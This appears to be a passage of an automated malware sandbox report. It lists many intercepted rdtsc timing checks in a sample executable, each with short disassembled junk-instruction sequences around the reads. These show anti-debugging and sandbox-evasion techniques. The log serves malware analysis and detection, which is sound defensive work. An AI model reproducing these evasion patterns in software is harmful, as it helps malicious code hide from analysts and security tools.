                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B30E0 second address: 10B30E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B34B8 second address: 10B34C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B34C9 second address: 10B34EE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F664452DAE3h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10B34EE second address: 10B3501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BA0F9 second address: 10BA0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BA0FF second address: 10BA107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BA107 second address: 10BA136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F664452DAE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F664452DAD6h 0x00000017 jng 00007F664452DAD6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BA136 second address: 10BA13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BC470 second address: 10BC476 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BC1D4 second address: 10BC1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BC1DC second address: 10BC1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DADAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10BF457 second address: 10BF45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C36DB second address: 10C36E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C36E0 second address: 10C36E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C36E6 second address: 10C36EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3831 second address: 10C3844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6644F246F2h 0x0000000b jns 00007F6644F246E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39C6 second address: 10C39CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39CA second address: 10C39DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F6644F246E6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39DB second address: 10C39DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39DF second address: 10C39F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39F3 second address: 10C39FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C39FA second address: 10C3A0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6644F246EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3A0A second address: 10C3A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3B4A second address: 10C3B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3B4E second address: 10C3B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3B52 second address: 10C3B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3B58 second address: 10C3B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3B5E second address: 10C3B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6644F246E6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F6644F246E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3CF6 second address: 10C3D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F664452DAD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3D00 second address: 10C3D20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F6644F2471Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6644F246F0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C3D20 second address: 10C3D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9DFE second address: 10C9E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C895A second address: 10C8966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F664452DAD6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8966 second address: 10C8987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6644F246F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6644F246E6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8D7B second address: 10C8D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8D81 second address: 10C8D9F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6644F246F8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8D9F second address: 10C8DA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8DA4 second address: 10C8DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8DB1 second address: 10C8DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F664452DAD6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107111A second address: 107111E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107111E second address: 1071179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov ecx, 052AFA56h 0x0000000d mov ebx, dword ptr [ebp+1248C216h] 0x00000013 mov edi, dword ptr [ebp+122D2D7Eh] 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F664452DAD8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 call 00007F664452DADEh 0x0000003a add dl, 00000026h 0x0000003d pop edx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 ja 00007F664452DADCh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071179 second address: 10711F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F6644F246E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F6644F246F0h 0x00000014 jc 00007F6644F246ECh 0x0000001a jg 00007F6644F246E6h 0x00000020 pop edi 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F6644F246E8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d jns 00007F6644F246F8h 0x00000043 nop 0x00000044 jmp 00007F6644F246EEh 0x00000049 push eax 0x0000004a pushad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8F45 second address: 10C8F4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F664452DAD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8F4F second address: 10C8F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9AFE second address: 10C9B08 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B08 second address: 10C9B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B0D second address: 10C9B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F664452DAD6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B1E second address: 10C9B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CCDB1 second address: 10CCDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC530 second address: 10CC534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC534 second address: 10CC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC53A second address: 10CC540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC540 second address: 10CC545 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6C5 second address: 10CC6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6CB second address: 10CC6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6DF second address: 10CC6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F63 second address: 10D5F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F67 second address: 10D5F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F6D second address: 10D5F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F73 second address: 10D5FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F6644F246F8h 0x00000013 jmp 00007F6644F246F0h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D408C second address: 10D4090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4090 second address: 10D4096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4096 second address: 10D40A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F664452DAD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D40A0 second address: 10D40A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D40A4 second address: 10D40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DADEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D43F0 second address: 10D43FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6644F246E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D43FC second address: 10D4401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4401 second address: 10D4413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnp 00007F6644F246E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D49D1 second address: 10D49D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D49D5 second address: 10D49DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5050 second address: 10D506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D506F second address: 10D5074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D534E second address: 10D5353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5353 second address: 10D5359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5359 second address: 10D535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D535F second address: 10D536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6644F246EEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5689 second address: 10D568D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D568D second address: 10D5693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5693 second address: 10D56B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D56B3 second address: 10D56B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D595F second address: 10D5967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5967 second address: 10D596D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D596D second address: 10D598E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F664452DAD8h 0x0000000d je 00007F664452DADAh 0x00000013 js 00007F664452DADEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5C35 second address: 10D5C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5C4F second address: 10D5C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F664452DAD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9022 second address: 10D9026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9026 second address: 10D902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D945D second address: 10D9468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9468 second address: 10D946E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D946E second address: 10D9472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9472 second address: 10D9493 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007F664452DAD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jng 00007F664452DAD6h 0x00000015 pop esi 0x00000016 popad 0x00000017 js 00007F664452DAF6h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D9493 second address: 10D949F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D964F second address: 10D965B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E435A second address: 10E4360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4360 second address: 10E4364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E450A second address: 10E4517 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E496B second address: 10E496F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
